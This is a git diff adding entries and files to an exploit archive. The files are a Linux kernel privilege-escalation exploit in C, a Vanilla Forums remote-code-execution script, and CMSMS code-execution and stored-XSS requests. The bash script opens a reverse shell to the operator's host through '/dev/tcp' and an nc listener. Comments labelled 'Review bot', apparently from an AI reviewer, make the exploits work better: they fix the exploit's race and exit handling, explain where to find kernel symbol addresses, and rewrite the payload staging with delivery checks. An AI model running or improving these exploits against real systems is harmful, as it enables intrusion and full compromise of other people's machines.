diff --git a/files.csv b/files.csv
index 95b9851b8..e1fa86aca 100644
--- a/files.csv
+++ b/files.csv
@@ -2549,7 +2549,7 @@ id,file,description,date,author,platform,type,port
 20955,platforms/windows/dos/20955.pl,"Internet Download Manager - Memory Corruption",2012-08-31,Dark-Puzzle,windows,dos,0
 20922,platforms/osx/dos/20922.txt,"Rumpus FTP Server 1.3.x/2.0.3 - Stack Overflow Denial of Service",2001-06-12,"Jass Seljamaa",osx,dos,0
 20930,platforms/windows/dos/20930.c,"Microsoft Index Server 2.0 / Indexing Service (Windows 2000) - ISAPI Extension Buffer Overflow (PoC)",2001-06-18,Ps0,windows,dos,0
-20946,platforms/windows/dos/20946.txt,"Cerberus FTP Server 1.x - Buffer Overflow Denial of Service",2001-06-21,"Cartel Informatique Security Research Labs",windows,dos,0
+20946,platforms/windows/dos/20946.txt,"Cerberus FTP Server 1.x - Buffer Overflow Denial of Service",2001-06-21,Cartel,windows,dos,0
 20949,platforms/windows/dos/20949.c,"1C: Arcadia Internet Store 1.0 - Denial of Service",2001-06-21,"NERF Security",windows,dos,0
 20952,platforms/linux/dos/20952.c,"eXtremail 1.x/2.1 - Remote Format String (1)",2001-06-21,"Luca Ercoli",linux,dos,0
 20957,platforms/windows/dos/20957.pl,"WarFTP Daemon 1.82 RC 11 - Remote Format String",2012-08-31,coolkaveh,windows,dos,0
@@ -8863,8 +8863,8 @@ id,file,description,date,author,platform,type,port
 40759,platforms/linux/local/40759.rb,"Linux Kernel 4.4 (Ubuntu 16.04) - 'BPF' Privilege Escalation (Metasploit)",2016-11-14,Metasploit,linux,local,0
 40741,platforms/windows/local/40741.py,"Avira Antivirus 15.0.21.86 - '.zip' Directory Traversal / Command Execution",2016-11-08,R-73eN,windows,local,0
 40765,platforms/windows/local/40765.cs,"Microsoft Windows - VHDMP Arbitrary Physical Disk Cloning Privilege Escalation (MS16-138)",2016-11-15,"Google Security Research",windows,local,0
-40788,platforms/linux/local/40788.txt,"Palo Alto Networks PanOS root_trace - Privilege Escalation",2016-11-18,"Google Security Research",linux,local,0
-40789,platforms/linux/local/40789.txt,"Palo Alto Networks PanOS - root_reboot Privilege Escalation",2016-11-18,"Google Security Research",linux,local,0
+40788,platforms/linux/local/40788.txt,"Palo Alto Networks PanOS - 'root_trace' Privilege Escalation",2016-11-18,"Google Security Research",linux,local,0
+40789,platforms/linux/local/40789.txt,"Palo Alto Networks PanOS - 'root_reboot' Privilege Escalation",2016-11-18,"Google Security Research",linux,local,0
 40807,platforms/windows/local/40807.txt,"Huawei UTPS - Unquoted Service Path Privilege Escalation",2016-11-22,"Dhruv Shah",windows,local,0
 40810,platforms/linux/local/40810.c,"Linux Kernel 2.6.18 - 'move_pages()' Information Leak",2010-02-08,spender,linux,local,0
 40811,platforms/lin_x86-64/local/40811.c,"Linux Kernel 2.6.32-rc1 (x86-64) - Register Leak",2009-10-04,spender,lin_x86-64,local,0
@@ -8979,7 +8979,8 @@ id,file,description,date,author,platform,type,port
 41959,platforms/windows/local/41959.txt,"Serviio PRO 1.8 DLNA Media Streaming Server - Local Privilege Escalation",2017-05-03,LiquidWorm,windows,local,0
 41972,platforms/windows/local/41972.txt,"Gemalto SmartDiag Diagnosis Tool < 2.5 - Buffer Overflow (SEH)",2017-05-08,"Majid Alqabandi",windows,local,0
 41973,platforms/linux/local/41973.txt,"Xen 64bit PV Guest - pagetable use-after-type-change Breakout",2017-05-08,"Google Security Research",linux,local,0
-41994,platforms/linux/local/41994.c,"Linux Kernel 4.8.0 - Packet Socket Local root Privilege Escalation",2017-05-11,"Andrey Konovalov",linux,local,0
+41994,platforms/linux/local/41994.c,"Linux Kernel 4.8.0 (Ubuntu) - Packet Socket Local Privilege Escalation",2017-05-11,"Andrey Konovalov",linux,local,0
+41995,platforms/linux/local/41995.c,"Linux Kernel 3.11 < 4.8 0 - 'SO_SNDBUFFORCE' & 'SO_RCVBUFFORCE' Local Privilege Escalation",2017-02-22,"Andrey Konovalov",linux,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
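Review bot: The new `41995` description reads `Linux Kernel 3.11 < 4.8 0 - ...`; the stray `0` after `4.8` looks like a typo, and the file it indexes says `Affected kernels: 3.11 -> 4.8` in its own header, so the line should read `41995,platforms/linux/local/41995.c,"Linux Kernel 3.11 < 4.8 - 'SO_SNDBUFFORCE' & 'SO_RCVBUFFORCE' Local Privilege Escalation",2017-02-22,"Andrey Konovalov",linux,local,0`. The date `2017-02-22` is three months earlier than the sibling `41994` entry added in the same commit; that is fine if it is the original publication date, but worth confirming since the other new entries all carry 2017-05 dates.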
@@ -15498,7 +15499,8 @@ id,file,description,date,author,platform,type,port
 41975,platforms/windows/remote/41975.txt,"Microsoft Security Essentials / SCEP (Microsoft Windows 8/8.1/10 / Windows Server) - 'MsMpEng' Remotely Exploitable Type Confusion",2017-05-09,"Google Security Research",windows,remote,0
 41978,platforms/multiple/remote/41978.py,"Oracle GoldenGate 12.1.2.0.0 - Unauthenticated Remote Code Execution",2017-05-09,"Silent Signal",multiple,remote,0
 41980,platforms/python/remote/41980.rb,"Crypttech CryptoLog - Remote Code Execution (Metasploit)",2017-05-09,Metasploit,python,remote,80
-41992,platforms/windows/remote/41992.rb,"Microsoft IIS WebDav - ScStoragePathFromUrl Overflow (Metasploit)",2017-05-11,Metasploit,windows,remote,0
+41992,platforms/windows/remote/41992.rb,"Microsoft IIS - WebDav 'ScStoragePathFromUrl' Overflow (Metasploit)",2017-05-11,Metasploit,windows,remote,0
+41996,platforms/php/remote/41996.sh,"Vanilla Forums < 2.3 - Remote Code Execution",2017-05-11,"Dawid Golunski",php,remote,0
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@@ -36101,7 +36103,7 @@ id,file,description,date,author,platform,type,port
 38127,platforms/php/webapps/38127.php,"PHP 5.5.9 - cgimode fpm writeprocmemfile Bypass disable function",2015-09-10,ylbhz,php,webapps,0
 38128,platforms/cgi/webapps/38128.txt,"Synology Video Station 1.5-0757 - Multiple Vulnerabilities",2015-09-10,"Han Sahin",cgi,webapps,5000
 38129,platforms/php/webapps/38129.txt,"Octogate UTM 3.0.12 - Admin Interface Directory Traversal",2015-09-10,"Oliver Karow",php,webapps,0
-38130,platforms/java/webapps/38130.txt,"N-able N-central - Cross-Site Request Forgery",2012-12-13,"Cartel Informatique Security Research Labs",java,webapps,0
+38130,platforms/java/webapps/38130.txt,"N-able N-central - Cross-Site Request Forgery",2012-12-13,Cartel,java,webapps,0
 38131,platforms/php/webapps/38131.txt,"PHP Address Book - 'group' Parameter Cross-Site Scripting",2012-12-13,"Kenneth F. Belva",php,webapps,0
 38133,platforms/php/webapps/38133.txt,"WordPress Plugin RokBox Plugin - /wp-content/plugins/wp_rokbox/jwplayer/jwplayer.swf abouttext Parameter Cross-Site Scripting",2012-12-17,MustLive,php,webapps,0
 38134,platforms/php/webapps/38134.txt,"Joomla! Component 'com_ztautolink' - 'Controller' Parameter Local File Inclusion",2012-12-19,Xr0b0t,php,webapps,0
@@ -37838,3 +37840,4 @@ id,file,description,date,author,platform,type,port
 41988,platforms/php/webapps/41988.txt,"QNAP PhotoStation 5.2.4 / MusicStation 4.8.4 - Authentication Bypass",2017-05-10,"Kacper Szurek",php,webapps,8080
 41989,platforms/php/webapps/41989.txt,"BanManager WebUI 1.5.8 - PHP Code Injection",2017-05-10,HaHwul,php,webapps,0
 41990,platforms/php/webapps/41990.html,"Gongwalker API Manager 1.1 - Cross-Site Request Forgery",2017-05-10,HaHwul,php,webapps,0
+41997,platforms/php/webapps/41997.txt,"CMS Made Simple 2.1.6 - Multiple Vulnerabilities",2017-05-10,"Osanda Malith",php,webapps,0
diff --git a/platforms/linux/local/41995.c b/platforms/linux/local/41995.c
new file mode 100755
index 000000000..3bebff536
--- /dev/null
+++ b/platforms/linux/local/41995.c
@@ -0,0 +1,176 @@
+// CAP_NET_ADMIN -> root LPE exploit for CVE-2016-9793
+// No KASLR, SMEP or SMAP bypass included
+// Affected kernels: 3.11 -> 4.8
+// Tested in QEMU only
+// https://github.com/xairy/kernel-exploits/tree/master/CVE-2016-9793
+//
+// Usage:
+// # gcc -pthread exploit.c -o exploit
+// # chown guest:guest exploit
+// # setcap cap_net_admin+ep ./exploit
+// # su guest
+// $ whoami
+// guest
+// $ ./exploit
+// [.] userspace payload mmapped at 0xfffff000
+// [.] overwriting thread started
+// [.] sockets opened
+// [.] sock->sk_sndbuf set to fffffe00
+// [.] writing to socket
+// [+] got r00t
+// # whoami
+// root
+//
+// Andrey Konovalov
+
+#define _GNU_SOURCE
+
+#include 
+#include 
+#include 
+#include 
+#include 
+#include 
+
+#include 
+#include 
+#include 
+#include 
+#include 
+#include 
+#include 
+#include 
+#include 
+
+#define COMMIT_CREDS 0xffffffff81079860ul
+#define PREPARE_KERNEL_CRED 0xffffffff81079b20ul
+
+typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
+typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
+
+_commit_creds commit_creds = (_commit_creds)COMMIT_CREDS;
+_prepare_kernel_cred prepare_kernel_cred = (_prepare_kernel_cred)PREPARE_KERNEL_CRED;
+
+void get_root(void) {
+ commit_creds(prepare_kernel_cred(0));
+}
+
+struct ubuf_info_t {
+ uint64_t callback; // void (*callback)(struct ubuf_info *, bool)
+ uint64_t ctx; // void *
+ uint64_t desc; // unsigned long
+};
+
+struct skb_shared_info_t {
+ uint8_t nr_frags; // unsigned char
+ uint8_t tx_flags; // __u8
+ uint16_t gso_size; // unsigned short
+ uint16_t gso_segs; // unsigned short
+ uint16_t gso_type; // unsigned short
+ uint64_t frag_list; // struct sk_buff *
+ uint64_t hwtstamps; // struct skb_shared_hwtstamps
+ uint32_t tskey; // u32
+ uint32_t ip6_frag_id; // __be32
+ uint32_t dataref; // atomic_t
+ uint64_t destructor_arg; // void *
+ uint8_t frags[16][17]; // skb_frag_t frags[MAX_SKB_FRAGS];
+};
+
+// sk_sndbuf = 0xffffff00 => skb_shinfo(skb) = 0x00000000fffffed0
+#define SNDBUF 0xffffff00
+#define SHINFO 0x00000000fffffed0ul
+
+struct ubuf_info_t ubuf_info = {(uint64_t)&get_root, 0, 0};
+//struct ubuf_info_t ubuf_info = {0xffffdeaddeadbeeful, 0, 0};
+struct skb_shared_info_t *skb_shared_info = (struct skb_shared_info_t *)SHINFO;
+
+#define SKBTX_DEV_ZEROCOPY (1 << 3)
+
+void* skb_thr(void* arg) {
+ while (1) {
+ skb_shared_info->destructor_arg = (uint64_t)&ubuf_info;
+ skb_shared_info->tx_flags |= SKBTX_DEV_ZEROCOPY;
+ }
+}
+
+int sockets[2];
+
+void *write_thr(void *arg) {
+ // Write blocks until setsockopt(SO_SNDBUF).
+ write(sockets[1], "\x5c", 1);
+
+ if (getuid() == 0) {
+ printf("[+] got r00t\n");
+ execl("/bin/bash", "bash", NULL);
+ perror("execl()");
+ }
+ printf("[-] something went wrong\n");
+}
+
+int main() {
+ void *addr;
+ int rv;
+ uint32_t sndbuf;
+
+ addr = mmap((void *)(SHINFO & 0xfffffffffffff000ul), 0x1000ul,
+ PROT_READ | PROT_WRITE, MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE,
+ -1, 0);
+ if (addr != (void *)(SHINFO & 0xfffffffffffff000ul)) {
+ perror("mmap()");
+ exit(EXIT_FAILURE);
+ }
+
+ printf("[.] userspace payload mmapped at %p\n", addr);
+
+ pthread_t skb_th;
+ rv = pthread_create(&skb_th, 0, skb_thr, NULL);
+ if (rv != 0) {
+ perror("pthread_create()");
+ exit(EXIT_FAILURE);
+ }
+ usleep(10000);
+
+ printf("[.] overwriting thread started\n");
+
+ rv = socketpair(AF_LOCAL, SOCK_STREAM, 0, &sockets[0]);
+ if (rv != 0) {
+ perror("socketpair()");
+ exit(EXIT_FAILURE);
+ }
+
+ printf("[.] sockets opened\n");
+
+ sndbuf = SNDBUF;
+ rv = setsockopt(sockets[1], SOL_SOCKET, SO_SNDBUFFORCE,
+ &sndbuf, sizeof(sndbuf));
+ if (rv != 0) {
+ perror("setsockopt()");
+ exit(EXIT_FAILURE);
+ }
+
+ printf("[.] sock->sk_sndbuf set to %x\n", SNDBUF * 2);
+
+ pthread_t write_th;
+ rv = pthread_create(&write_th, 0, write_thr, NULL);
+ if (rv != 0) {
+ perror("pthread_create()");
+ exit(EXIT_FAILURE);
+ }
+ usleep(10000);
+
+ printf("[.] writing to socket\n");
+
+ // Wake up blocked write.
+ rv = setsockopt(sockets[1], SOL_SOCKET, SO_SNDBUF,
+ &sndbuf, sizeof(sndbuf));
+ if (rv != 0) {
+ perror("setsockopt()");
+ exit(EXIT_FAILURE);
+ }
+ usleep(10000);
+
+ close(sockets[0]);
+ close(sockets[1]);
+
+ return 0;
+}
\ No newline at end of file
diff --git a/platforms/php/remote/41996.sh b/platforms/php/remote/41996.sh
new file mode 100755
index 000000000..86e528a72
--- /dev/null
+++ b/platforms/php/remote/41996.sh
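Review bot: `write_thr` is declared `void *` but reaches its closing brace without a `return` on the non-root path (and after a failed `execl`), which is undefined behaviour for a non-void C function and is what `-Wreturn-type` flags; add `return NULL;` after `printf("[-] something went wrong\n");`. Related, `main` waits a fixed 10 ms after the wake-up `setsockopt` and then returns 0 regardless of outcome, so a failed attempt reports success and the race is decided by the sleep rather than by the thread; replacing the final `usleep(10000);` with `pthread_join(write_th, NULL);` and then `return EXIT_FAILURE;` (only reachable when `write_thr` did not exec a shell) makes the exit status meaningful. `COMMIT_CREDS` and `PREPARE_KERNEL_CRED` are symbol addresses of one particular kernel build — a user has to take them from the target's `/proc/kallsyms` or `System.map` — and the header's "No KASLR, SMEP or SMAP bypass" caveat is load-bearing, since `SHINFO` is a userspace page the kernel is made to dereference and `get_root` runs from user memory. For defenders: the trigger needs `CAP_NET_ADMIN` (the privilege the usage block grants with `setcap`) on a kernel in the stated 3.11–4.8 range, and per the comments the `write(sockets[1], ...)` stays blocked until the second `setsockopt`, so a capable process stuck in a blocked AF_UNIX write with an absurd `sk_sndbuf` is the observable; I believe the upstream fix clamping the forced buffer sizes shipped in 4.9, but confirm that against the CVE record rather than this note.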
@@ -0,0 +1,211 @@
+#!/bin/bash
+#
+# __ __ __ __ __
+# / / ___ ____ _____ _/ / / / / /___ ______/ /_____ __________
+# / / / _ \/ __ `/ __ `/ / / /_/ / __ `/ ___/ //_/ _ \/ ___/ ___/
+# / /___/ __/ /_/ / /_/ / / / __ / /_/ / /__/ ,< / __/ / (__ )
+# /_____/\___/\__, /\__,_/_/ /_/ /_/\__,_/\___/_/|_|\___/_/ /____/
+# /____/
+#
+#
+# Vanilla Forums <= 2.3 Remote Code Execution (RCE) PoC Exploit 0day
+# Core version (no plugins, default config.)
+#
+# CVE-2016-10033 (RCE)
+# CVE-2016-10073 (Header Injection)
+#
+# vanilla-forums-rce-exploit.sh (ver. 1.0)
+#
+#
+# Discovered and coded by
+#
+# Dawid Golunski
+# https://legalhackers.com
+# https://twitter.com/dawid_golunski
+#
+# ExploitBox project:
+# https://ExploitBox.io
+#
+#
+# Exploit code:
+# https://exploitbox.io/exploit/vanilla-forums-rce-exploit.sh
+#
+# Full advisory URL:
+# https://exploitbox.io/vuln/Vanilla-Forums-Exploit-RCE-0day-Remote-Code-Exec-CVE-2016-10033.html
+#
+# Related advisories:
+# https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html
+# https://exploitbox.io/vuln/Vanilla-Forums-Exploit-Host-Header-Injection-CVE-2016-10073-0day.html
+#
+# White-paper 'Pwning PHP mail() function For Fun And RCE'
+# https://exploitbox.io/paper/Pwning-PHP-Mail-Function-For-Fun-And-RCE.html
+#
+#
+# Usage:
+# ./vanilla-forums-rce-exploit.sh target-forum-url reverse_shell_ip
+#
+# Tested on:
+# Vanilla Core 2.3
+# https://open.vanillaforums.com/addon/vanilla-core-2.3
+#
+# Disclaimer:
+# For testing purposes only
+#
+#
+# -----------------------------------------------------------------
+#
+# Interested in vulnerabilities/exploitation?
+#
+#
+# .;lc'
+# .,cdkkOOOko;.
+# .,lxxkkkkOOOO000Ol'
+# .':oxxxxxkkkkOOOO0000KK0x:'
+# .;ldxxxxxxxxkxl,.'lk0000KKKXXXKd;.
+# ':oxxxxxxxxxxo;. .:oOKKKXXXNNNNOl.
+# '';ldxxxxxdc,. ,oOXXXNNNXd;,.
+# .ddc;,,:c;. ,c: .cxxc:;:ox:
+# .dxxxxo, ., ,kMMM0:. ., .lxxxxx:
+# .dxxxxxc lW. oMMMMMMMK d0 .xxxxxx:
+# .dxxxxxc .0k.,KWMMMWNo :X: .xxxxxx:
+# .dxxxxxc .xN0xxxxxxxkXK, .xxxxxx:
+# .dxxxxxc lddOMMMMWd0MMMMKddd. .xxxxxx:
+# .dxxxxxc .cNMMMN.oMMMMx' .xxxxxx:
+# .dxxxxxc lKo;dNMN.oMM0;:Ok. 'xxxxxx:
+# .dxxxxxc ;Mc .lx.:o, Kl 'xxxxxx:
+# .dxxxxxdl;. ., .. .;cdxxxxxx:
+# .dxxxxxxxxxdc,. 'cdkkxxxxxxxx:
+# .':oxxxxxxxxxdl;. .;lxkkkkkxxxxdc,.
+# .;ldxxxxxxxxxdc, .cxkkkkkkkkkxd:.
+# .':oxxxxxxxxx.ckkkkkkkkxl,.
+# .,cdxxxxx.ckkkkkxc.
+# .':odx.ckxl,.
+# .,.'.
+#
+# Subscribe at:
+#
+# https://ExploitBox.io
+#
+# https://twitter.com/Exploit_Box
+#
+# -----------------------------------------------------------------
+
+intro="
+DQobWzBtIBtbMjFDG1sxOzM0bSAgICAuO2xjJw0KG1swbSAbWzIxQxtbMTszNG0uLGNka2tPT09r
+bzsuDQobWzBtICAgX19fX19fXxtbOEMbWzE7MzRtLiwgG1swbV9fX19fX19fG1s1Q19fX19fX19f
+G1s2Q19fX19fX18NCiAgIFwgIF9fXy9fIF9fX18gG1sxOzM0bScbWzBtX19fXBtbNkMvX19fX19c
+G1s2Q19fX19fX19cXyAgIF8vXw0KICAgLyAgXy8gICBcXCAgIFwvICAgLyAgIF9fLxtbNUMvLyAg
+IHwgIFxfX19fXy8vG1s3Q1wNCiAgL19fX19fX19fXz4+G1s2QzwgX18vICAvICAgIC8tXCBfX19f
+IC8bWzVDXCBfX19fX19fLw0KIBtbMTFDPF9fXy9cX19fPiAgICAvX19fX19fX18vICAgIC9fX19f
+X19fPg0KIBtbNkMbWzE7MzRtLmRkYzssLDpjOy4bWzlDG1swbSxjOhtbOUMbWzM0bS5jeHhjOjs6
+b3g6DQobWzM3bSAbWzZDG1sxOzM0bS5keHh4eG8sG1s1QxtbMG0uLCAgICxrTU1NMDouICAuLBtb
+NUMbWzM0bS5seHh4eHg6DQobWzM3bSAbWzZDG1sxOzM0bS5keHh4eHhjG1s1QxtbMG1sVy4gb01N
+TU1NTU1LICBkMBtbNUMbWzM0bS54eHh4eHg6DQobWzM3bSAbWzZDG1sxOzM0bS5keHh4eHhjG1s1
+QxtbMG0uMGsuLEtXTU1NV05vIDpYOhtbNUMbWzM0bS54eHh4eHg6DQobWzM3bSAbWzZDLhtbMTsz
+NG1keHh4eHhjG1s2QxtbMG0ueE4weHh4eHh4eGtYSywbWzZDG1szNG0ueHh4eHh4Og0KG1szN20g
+G1s2Qy4bWzE7MzRtZHh4eHh4YyAgICAbWzBtbGRkT01NTU1XZDBNTU1NS2RkZC4gICAbWzM0bS54
+eHh4eHg6DQobWzM3bSAbWzZDG1sxOzM0bS5keHh4eHhjG1s2QxtbMG0uY05NTU1OLm9NTU1NeCcb
+WzZDG1szNG0ueHh4eHh4Og0KG1szN20gG1s2QxtbMTszNG0uZHh4eHh4YxtbNUMbWzBtbEtvO2RO
+TU4ub01NMDs6T2suICAgIBtbMzRtJ3h4eHh4eDoNChtbMzdtIBtbNkMbWzE7MzRtLmR4eHh4eGMg
+ICAgG1swbTtNYyAgIC5seC46bywgICAgS2wgICAgG1szNG0neHh4eHh4Og0KG1szN20gG1s2Qxtb
+MTszNG0uZHh4eHh4ZGw7LiAuLBtbMTVDG1swOzM0bS4uIC47Y2R4eHh4eHg6DQobWzM3bSAbWzZD
+G1sxOzM0bS5keHh4eCAbWzBtX19fX19fX18bWzEwQ19fX18gIF9fX19fIBtbMzRteHh4eHg6DQob
+WzM3bSAbWzdDG1sxOzM0bS4nOm94IBtbMG1cG1s2Qy9fIF9fX19fX19fXCAgIFwvICAgIC8gG1sz
+NG14eGMsLg0KG1szN20gG1sxMUMbWzE7MzRtLiAbWzBtLxtbNUMvICBcXBtbOEM+G1s3QzwgIBtb
+MzRteCwNChtbMzdtIBtbMTJDLxtbMTBDLyAgIHwgICAvICAgL1wgICAgXA0KIBtbMTJDXF9fX19f
+X19fXzxfX19fX19fPF9fX18+IFxfX19fPg0KIBtbMjFDG1sxOzM0bS4nOm9keC4bWzA7MzRtY2t4
+bCwuDQobWzM3bSAbWzI1QxtbMTszNG0uLC4bWzA7MzRtJy4NChtbMzdtIA0K"
+
+
+function prep_host_header() {
+ cmd="$1"
+ rce_cmd="\${run{$cmd}}";
+
+ # replace / with ${substr{0}{1}{$spool_directory}}
+ #sed 's^/^${substr{0}{1}{$spool_directory}}^g'
+ rce_cmd="`echo $rce_cmd | sed 's^/^\${substr{0}{1}{\$spool_directory}}^g'`"
+
+ # replace ' ' (space) with
+ #sed 's^ ^${substr{10}{1}{$tod_log}}$^g'
+ rce_cmd="`echo $rce_cmd | sed 's^ ^\${substr{10}{1}{\$tod_log}}^g'`"
+ #return "target(any -froot@localhost -be $rce_cmd null)"
+ host_header="target(any -froot@localhost -be $rce_cmd null)"
+ return 0
+}
+
+
+echo "$intro" | base64 -d
+
+if [ "$#" -ne 2 ]; then
+ echo -e "Usage:\n$0 target-forum-url reverse_shell_ip\n"
+ exit 1
+fi
+target="$1"
+rev_host="$2"
+
+
+echo -e ' \e[44m| ExploitBox.io |\e[0m'
+echo -e "
+\e[94m+ --=|\e[0m \e[91m Vanilla Forums <= 2.3 Unauth. RCE Exploit \e[0m \e[94m|\e[0m"
+#sleep 1s
+echo -e "\e[94m+ --=|\e[0m \e[94m|\e[0m
+\e[94m+ --=|\e[0m Discovered & Coded By \e[94m|\e[0m
+\e[94m+ --=|\e[0m \033[94mDawid Golunski\033[0m \e[94m|\e[0m
+\e[94m+ --=|\e[0m \033[94mhttps://legalhackers.com\033[0m \e[94m|\e[0m
+\e[94m+ --=|\e[0m \033[94m@dawid_golunski\033[0m \e[94m|\e[0m
+\e[94m+ --=|\e[0m \e[94m|\e[0m
+\e[94m+ --=|\e[0m \"With Great Power Comes Great Responsibility\" \e[94m|\e[0m
+\e[94m+ --=|\e[0m \e[91m*\e[0m For testing purposes only \e[91m*\e[0m \e[94m|\e[0m
+
+"
+
+echo -ne "\e[91m[*]\033[0m"
+read -p " Sure you want to get a shell on the target '$target' ? [y/N] " choice
+echo
+if [ "$choice" == "y" ]; then
+
+ echo -e "\e[92m[*]\033[0m Guess I can't argue with that... Let's get started...\n"
+ #sleep 2s
+ #sleep 2s
+
+ # Host payload on :80
+ RCE_exec_cmd="(sleep 5s && nohup bash -i >/dev/tcp/$rev_host/1337 0<&1 2>&1) &"
+ echo "$RCE_exec_cmd" > rce.txt
+ python -mSimpleHTTPServer 80 2>/dev/null >&2 &
+ hpid=$!
+
+ # POST data string
+ data='hpt=&Target=discussions&Email=admin&Request+a+new+password=Request+a+new+password&DeliveryType=VIEW&DeliveryMethod=JSON'
+
+ # Save payload on the target in /tmp/rce
+ cmd="/usr/bin/curl -o/tmp/rce $rev_host/rce.txt"
+ prep_host_header "$cmd"
+ curl -H"Host: $host_header" -0 -s -i -d "$data" $target/entry/passwordrequest | grep -q "200 OK"
+ if [ $? -ne 0 ]; then
+ echo "[!] Failed conecting to the target URL. Exiting"
+ exit 2
+ fi
+ echo -e "\e[92m[+]\033[0m Connected to the target"
+ echo -e "\n\e[92m[+]\e[0m Payload sent successfully"
+ sleep 2s
+
+ # Execute payload (RCE_exec_cmd) on the target /bin/bash /tmp/rce
+ cmd="/usr/bin/nohup /bin/bash /tmp/rce"
+ prep_host_header "$cmd"
+ #echo -e "Host Payload2: \nHost: $host_header"
+ curl -H"Host: $host_header" -s -0 -i -d "$data" $target/entry/passwordrequest >/dev/null 2>&1 &
+ echo -e "\n\e[92m[+]\033[0m Payload executed!"
+
+ echo -e "\n\e[92m[*]\033[0m Waiting for the target to send us a \e[94mreverse shell\e[0m...\n"
+ nc -vv -l 1337
+ #killall python
+ echo
+else
+ echo -e "\e[92m[+]\033[0m Responsible choice ;) Exiting.\n"
+ exit 0
+
+fi
+ #kill -9 $hpid
+
+echo "Exiting..."
+exit 0
\ No newline at end of file
diff --git a/platforms/php/webapps/41997.txt b/platforms/php/webapps/41997.txt
new file mode 100755
index 000000000..55c2abb42
--- /dev/null
+++ b/platforms/php/webapps/41997.txt
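Review bot: `python -mSimpleHTTPServer 80` is started in whatever directory the operator happens to run the script from and is never stopped — the only `kill -9 $hpid` is commented out at the bottom — so every file in that directory is served on TCP/80 to anyone who can reach the attacking host, and keeps being served after the script exits; `rce.txt` is likewise left behind. Staging the payload in a `mktemp -d` directory, starting the server from there, and killing it and removing the directory from an `EXIT` trap fixes all three, as sketched below. The `nc -vv -l 1337` listener has the same shape — it binds every interface with no peer check, so on a shared engagement box whoever connects first gets the target's shell. Separately, `[+] Payload sent successfully` is printed on the strength of a `200 OK` from `/entry/passwordrequest` alone, which says nothing about whether the target actually fetched `rce.txt`; the HTTP server's request log, currently discarded with `2>/dev/null`, is the signal worth checking before moving on to the second request. Both `prep_host_header` and the `if` body are complete within the hunk.
```shell
  # Host payload on :80 — serve from a private temp dir rather than the
  # caller's cwd, and tear the server and the file down on any exit path.
  stage_dir=$(mktemp -d) || { echo "[!] mktemp failed" >&2; exit 2; }
  cleanup() { [ -n "${hpid:-}" ] && kill "$hpid" 2>/dev/null; rm -rf -- "${stage_dir:?}"; }
  trap cleanup EXIT
  RCE_exec_cmd="(sleep 5s && nohup bash -i >/dev/tcp/$rev_host/1337 0<&1 2>&1) &"
  printf '%s\n' "$RCE_exec_cmd" > "$stage_dir/rce.txt"
  (cd "$stage_dir" && exec python -mSimpleHTTPServer 80) > "$stage_dir/http.log" 2>&1 &
  hpid=$!
  # … unchanged: POST data, first prep_host_header/curl, "Connected to the target" …
  sleep 2s
  # Only claim delivery once the target has actually fetched the payload.
  if ! grep -q 'rce.txt' "$stage_dir/http.log"; then
    echo "[!] Target never requested rce.txt; payload was not delivered" >&2
    exit 3
  fi
  # … unchanged: second prep_host_header/curl, nc listener …
```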
@@ -0,0 +1,30 @@
+# Title: CMSMS 2.1.6 Multiple Vulnerabilities
+# Date: 10-05-2017
+# Tested on: Windows 8 64-bit
+# Exploit Author: Osanda Malith Jayathissa (@OsandaMalith)
+# Original write-up: https://osandamalith.com/2017/05/11/cmsms-2-1-6-multiple-vulnerabilities/
+# CVE: CVE-2017-8912
+
+Remote Code Execution
+======================
+
+POST /cmsms/admin/editusertag.php?_sk_=2a7da2216d41e0ac&userplugin_id=4 HTTP/1.1
+
+_sk_=2a7da2216d41e0ac&userplugin_id=4&userplugin_name=aaa&code=passthru('dir')%3B&description=&run=1&apply=1&ajax=1
+
+
+Stored XSS
+==========
+
+POST /cmsms/admin/addgroup.php HTTP/1.1
+
+_sk_=92a32a8aaa87e958&group=%3Csvg%2Fonload%3Dalert%282%29%3E&description=%22%3E%3Csvg%2Fonload%3Dalert%283%29%3E&active=on&addgroup=true
+
+
+Disclosure Timeline
+====================
+
+09-05-2017: Reported to the vendor
+09-05-2017: Vendor doesn't accept XSS issues inside admin panel and claimed the RCE as a feature, not a bug :)
+10-05-2017: Public disclosure
+11-05-2017: Assigned CVE-2017-8912
\ No newline at end of file
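Review bot: The "Remote Code Execution" request goes to `/cmsms/admin/editusertag.php` and carries an admin session key `_sk_`, so this is PHP execution by an already-authenticated administrator through the user-defined-tag editor — which the timeline itself records the vendor calling a feature — rather than an unauthenticated RCE, and the title line should say so, e.g. `# Title: CMSMS 2.1.6 Authenticated (admin) Code Execution via User Defined Tags / Stored XSS`. The `_sk_` tokens and `userplugin_id=4` are specific to the author's session and install and must be taken from a live admin session; a one-line note above the first request such as `# _sk_ and userplugin_id are per-session / per-install values; copy them from an authenticated admin page` would save readers a failed replay. Both requests also omit the `Host`, `Cookie` and `Content-Type` headers a replay needs, so as written they are not copy-pasteable. The stored XSS has the same precondition — it takes an admin session to inject — so its realistic reach is presumably admin-to-admin, which the advisory should state.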